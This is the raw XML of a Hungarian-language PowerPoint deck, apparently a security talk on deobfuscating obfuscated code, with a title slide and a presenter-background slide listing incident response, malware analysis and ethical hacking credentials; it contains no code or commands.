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3" r:id="rId8"/>
    <p:sldId id="264" r:id="rId9"/>
    <p:sldId id="266" r:id="rId10"/>
    <p:sldId id="265"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C1DF91-355F-48A7-ABF8-7DC594045A0A}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="257"/>
            <p14:sldId id="258"/>
            <p14:sldId id="259"/>
            <p14:sldId id="260"/>
            <p14:sldId id="261"/>
            <p14:sldId id="263"/>
            <p14:sldId id="264"/>
            <p14:sldId id="266"/>
            <p14:sldId id="265"/>
            <p14:sldId id="267"/>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B67"/>
    <a:srgbClr val="CC9900"/>
    <a:srgbClr val="FA93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29" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="78" d="100"/>
          <a:sy n="78" d="100"/>
        </p:scale>
        <p:origin x="786"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2A48FC-EC23-4C7F-9B26-695DFADA10E2}" type="datetimeFigureOut">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>2025. 03. 20.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7C4D957-D90F-452F-99D4-DEED651642B1}" type="slidenum">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3675783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A48FC-EC23-4C7F-9B26-695DFADA10E2}" type="datetimeFigureOut">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>2025. 03. 20.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7C4D957-D90F-452F-99D4-DEED651642B1}" type="slidenum">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2385952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72A48FC-EC23-4C7F-9B26-695DFADA10E2}" type="datetimeFigureOut">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>2025. 03. 20.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7C4D957-D90F-452F-99D4-DEED651642B1}" type="slidenum">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3258452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72A48FC-EC23-4C7F-9B26-695DFADA10E2}" type="datetimeFigureOut">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>2025. 03. 20.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7C4D957-D90F-452F-99D4-DEED651642B1}" type="slidenum">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-H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3449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A48FC-EC23-4C7F-9B26-695DFADA10E2}" type="datetimeFigureOut">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>2025. 03. 20.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7C4D957-D90F-452F-99D4-DEED651642B1}" type="slidenum">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4109477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72A48FC-EC23-4C7F-9B26-695DFADA10E2}" type="datetimeFigureOut">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>2025. 03. 20.</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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7C4D957-D90F-452F-99D4-DEED651642B1}" type="slidenum">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4176971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72A48FC-EC23-4C7F-9B26-695DFADA10E2}" type="datetimeFigureOut">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>2025. 03. 20.</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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7C4D957-D90F-452F-99D4-DEED651642B1}" type="slidenum">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2367887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A48FC-EC23-4C7F-9B26-695DFADA10E2}" type="datetimeFigureOut">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>2025. 03. 20.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7C4D957-D90F-452F-99D4-DEED651642B1}" type="slidenum">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365562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A48FC-EC23-4C7F-9B26-695DFADA10E2}" type="datetimeFigureOut">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>2025. 03. 20.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7C4D957-D90F-452F-99D4-DEED651642B1}" type="slidenum">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1193694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72A48FC-EC23-4C7F-9B26-695DFADA10E2}" type="datetimeFigureOut">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>2025. 03. 20.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7C4D957-D90F-452F-99D4-DEED651642B1}" type="slidenum">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="723404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A48FC-EC23-4C7F-9B26-695DFADA10E2}" type="datetimeFigureOut">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>2025. 03. 20.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7C4D957-D90F-452F-99D4-DEED651642B1}" type="slidenum">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2029107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2A48FC-EC23-4C7F-9B26-695DFADA10E2}" type="datetimeFigureOut">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>2025. 03. 20.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7C4D957-D90F-452F-99D4-DEED651642B1}" type="slidenum">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89705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2A48FC-EC23-4C7F-9B26-695DFADA10E2}" type="datetimeFigureOut">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>2025. 03. 20.</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87C4D957-D90F-452F-99D4-DEED651642B1}" type="slidenum">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2042865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72A48FC-EC23-4C7F-9B26-695DFADA10E2}" type="datetimeFigureOut">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>2025. 03. 20.</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{87C4D957-D90F-452F-99D4-DEED651642B1}" type="slidenum">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2638008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72A48FC-EC23-4C7F-9B26-695DFADA10E2}" type="datetimeFigureOut">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>2025. 03. 20.</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{87C4D957-D90F-452F-99D4-DEED651642B1}" type="slidenum">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71175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72A48FC-EC23-4C7F-9B26-695DFADA10E2}" type="datetimeFigureOut">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>2025. 03. 20.</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{87C4D957-D90F-452F-99D4-DEED651642B1}" type="slidenum">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172397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A48FC-EC23-4C7F-9B26-695DFADA10E2}" type="datetimeFigureOut">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>2025. 03. 20.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7C4D957-D90F-452F-99D4-DEED651642B1}" type="slidenum">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326766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72A48FC-EC23-4C7F-9B26-695DFADA10E2}" type="datetimeFigureOut">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>2025. 03. 20.</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-H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hu-H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7C4D957-D90F-452F-99D4-DEED651642B1}" type="slidenum">
              <a:rPr lang="hu-HU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417204225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21.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject7.bin"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject9.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject2.bin"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject4.bin"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject8.bin"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject6.bin"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject10.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject3.bin"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.emf"/><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7" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EC12699-5D4D-42D8-836F-927B19665C6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6423022" y="605176"/>
            <a:ext cx="4886326" cy="456863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">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r"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Obfuszkált kódok deobfuszkálása</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17F82A8C-36C2-4AA6-852D-754B7FF3450F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742948" y="1299836"/>
            <a:ext cx="1543051" cy="373371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">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sz="2200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WHOAMI_</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3EA2CE9-A858-45E1-8ACA-EF54CC8BA490}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742949" y="1783045"/>
            <a:ext cx="5863591" cy="3886234"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">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hu-HU">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PROGRAMOZÁS | PYTHON</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>KIBERBIZTONSÁG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	|-DFIR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	|-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>incident </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ANALYST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	|-CODE ANALYst</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CERTEK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	|-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ICFC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>USA</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	|-MANDIANT MALWARE ANALYSIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	|-ETHICAL HACKING</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="hu-HU">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63939396-2181-4FC7-853E-A55D182CFD94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742949" y="457202"/>
            <a:ext cx="4629152" cy="666749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">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sz="4000">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>KÓD A KÖD MÖGÖTT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F04979-1B8B-4DD0-A339-6384F0BB6F5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742948" y="1126815"/>
            <a:ext cx="1056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85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E7A70C21-0C2D-48D1-B77D-596C1F38F52A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4785360" y="605176"/>
            <a:ext cx="6523988" cy="456863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">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r"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
